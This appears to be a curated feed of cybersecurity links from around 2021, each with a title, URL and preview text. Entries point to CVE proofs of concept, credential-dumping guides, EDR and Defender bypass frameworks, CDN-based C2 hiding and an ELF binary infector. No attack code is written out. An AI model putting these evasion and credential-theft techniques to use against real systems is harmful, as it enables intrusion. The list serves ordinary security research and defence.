An excel-centric approach for managing the MITRE ATT&CK® tactics and techniques.
https://github.com/RealityNet/attack-coverage
https://github.com/RealityNet/attack-coverage
GitHub
GitHub - RealityNet/attack-coverage: an excel-centric approach for the MITRE ATT&CK® Tactics and Techniques
an excel-centric approach for the MITRE ATT&CK® Tactics and Techniques - GitHub - RealityNet/attack-coverage: an excel-centric approach for the MITRE ATT&CK® Tactics and Techniques
The
https://github.com/Forescout/project-memoria-detector
project-memoria-detector tool aims to determine whether a target network device runs a specific embedded TCP/IP stack.https://github.com/Forescout/project-memoria-detector
GitHub
GitHub - Forescout/project-memoria-detector
Contribute to Forescout/project-memoria-detector development by creating an account on GitHub.
Bypassing LSA Protection in Userland
https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland/
https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland/
Building on the Shoulders of Giants: Combining TensorFlow and Rust
https://www.crowdstrike.com/blog/how-crowdstrike-combines-tensorflow-and-rust-for-performance/
https://www.crowdstrike.com/blog/how-crowdstrike-combines-tensorflow-and-rust-for-performance/
crowdstrike.com
How CrowdStrike Combines TensorFlow and Rust for Performance
In this blog, we share our perspectives on combining Rust’s and TensorFlow's powerful capabilities to boost both memory performance and speed capability.
Analysis of Chromium issue 1196683, 1195777
https://iamelli0t.github.io/2021/04/20/Chromium-Issue-1196683-1195777.html
https://iamelli0t.github.io/2021/04/20/Chromium-Issue-1196683-1195777.html
iamelli0t’s blog
Analysis of Chromium issue 1196683, 1195777
On April 12, a code commit[1] in Chromium get people’s attention. This is a bugfix for some vulnerability in Chromium Javascript engine v8. At the same time, the regression test case regress-1196683.js for this bugfix was also submitted. Based on this regression…
Remote Potato – From Domain User to Enterprise Admin
https://pentestlab.blog/2021/05/04/remote-potato-from-domain-user-to-enterprise-admin/
https://pentestlab.blog/2021/05/04/remote-potato-from-domain-user-to-enterprise-admin/
Penetration Testing Lab
Remote Potato – From Domain User to Enterprise Admin
NTLM Relaying is an well-known technique that was mainly used in security assessments in order to establish some sort of foothold on a server in the network or used for privilege escalation scenari…
repo contains information about EDRs that can be useful during red team exercise.
https://github.com/Mr-Un1k0d3r/EDRs
https://github.com/Mr-Un1k0d3r/EDRs
GitHub
GitHub - Mr-Un1k0d3r/EDRs
Contribute to Mr-Un1k0d3r/EDRs development by creating an account on GitHub.
Domain Borrowing is a new method to hide your C2 traffic with CDN
https://github.com/Dliv3/DomainBorrowing
https://github.com/Dliv3/DomainBorrowing
GitHub
GitHub - Dliv3/DomainBorrowing: Domain Borrowing PoC
Domain Borrowing PoC. Contribute to Dliv3/DomainBorrowing development by creating an account on GitHub.
CVE-2021-31166: Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.
https://github.com/0vercl0k/CVE-2021-31166
https://github.com/0vercl0k/CVE-2021-31166
GitHub
GitHub - 0vercl0k/CVE-2021-31166: Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.
Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely. - 0vercl0k/CVE-2021-31166
Credential Dumping cheatsheet
https://dl.packetstormsecurity.net/papers/general/credential_dumping.pdf
https://dl.packetstormsecurity.net/papers/general/credential_dumping.pdf
Dumping Plaintext RDP credentials from svchost.exe
https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/
www.n00py.io
Dumping Plaintext RDP credentials from svchost.exe
Recently I was browsing Twitter and came across a very interesting tweet: A simple string search within the process memory for svchost.exe revealed the plaintext password that was used to connect to the system via RDP. After some testing, I was also able…
An exploration of JSON interoperability vulnerabilities
https://labs.bishopfox.com/tech-blog/an-exploration-of-json-interoperability-vulnerabilities
https://labs.bishopfox.com/tech-blog/an-exploration-of-json-interoperability-vulnerabilities
Bishop Fox
An Exploration & Remediation of JSON Interoperability Vulnerabilities
Learn more about how the same JSON document can be parsed with different values across microservices, leading to a variety of potential security risks.
How to Exploit Active Directory ACL Attack Paths Through LDAP Relaying Attacks
https://www.praetorian.com/blog/how-to-exploit-active-directory-acl-attack-paths-through-ldap-relaying-attacks/
https://www.praetorian.com/blog/how-to-exploit-active-directory-acl-attack-paths-through-ldap-relaying-attacks/
Praetorian
How to Exploit Active Directory ACL Attack Paths Through LDAP Relaying Attacks
Overview This article describes methods by which an attacker can induce a victim user into authenticating using the NT Lan Manager (NTLM) Authentication Protocol to an attacker-controlled “Intranet” site, even in instances where that site points to an external…
Fuzzing exotic arch with AFL using ghidra emulator
https://airbus-cyber-security.com/fuzzing-exotic-arch-with-afl-using-ghidra-emulator/
https://airbus-cyber-security.com/fuzzing-exotic-arch-with-afl-using-ghidra-emulator/
Know Your Enemy: Exploiting the Dell BIOS Driver Vulnerability to Defend Against It
https://www.crowdstrike.com/blog/cve-2021-21551-learning-through-exploitation/
https://www.crowdstrike.com/blog/cve-2021-21551-learning-through-exploitation/
CrowdStrike.com
CVE-2021-21551: Learning Through Exploitation | CrowdStrike
Using CVE-2021-21551 as an example, learn how adversaries approach weaponizing vulnerabilities, and the technologies that work best to mitigate their tactics.
Privilege escalation with polkit: How to get root on Linux with a seven-year-old bug (CVE-2021-3560)
https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
The GitHub Blog
Privilege escalation with polkit: How to get root on Linux with a seven-year-old bug
polkit is a system service installed by default on many Linux distributions. It’s used by systemd, so any Linux distribution that uses systemd also uses polkit.
d0zer
Elf binary infector written in Golang. It can be used for infecting executables of type ET_DYN and ET_EXEC with a payload of your creation. Utilizing the classic elf text segment padding algorithm by Silvio Cesar, your payload (parasite) will run before native functionality of the binary effectively backooring the binary.
https://github.com/sad0p/d0zer
Elf binary infector written in Golang. It can be used for infecting executables of type ET_DYN and ET_EXEC with a payload of your creation. Utilizing the classic elf text segment padding algorithm by Silvio Cesar, your payload (parasite) will run before native functionality of the binary effectively backooring the binary.
https://github.com/sad0p/d0zer
GitHub
GitHub - sad0p/d0zer: Elf binary infector written in Go.
Elf binary infector written in Go. Contribute to sad0p/d0zer development by creating an account on GitHub.
A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.
https://github.com/optiv/Dent
https://github.com/optiv/Dent
GitHub
GitHub - optiv/Dent: A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.
A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors. - GitHub - optiv/Dent: A framework for creating COM-based bypasses utilizing vulnerabil...
DarkLoadLibrary (Bypassing Image Load Kernel Callbacks)
https://github.com/bats3c/DarkLoadLibrary
LoadLibrary for offensive operations.https://github.com/bats3c/DarkLoadLibrary
GitHub
GitHub - bats3c/DarkLoadLibrary: LoadLibrary for offensive operations
LoadLibrary for offensive operations. Contribute to bats3c/DarkLoadLibrary development by creating an account on GitHub.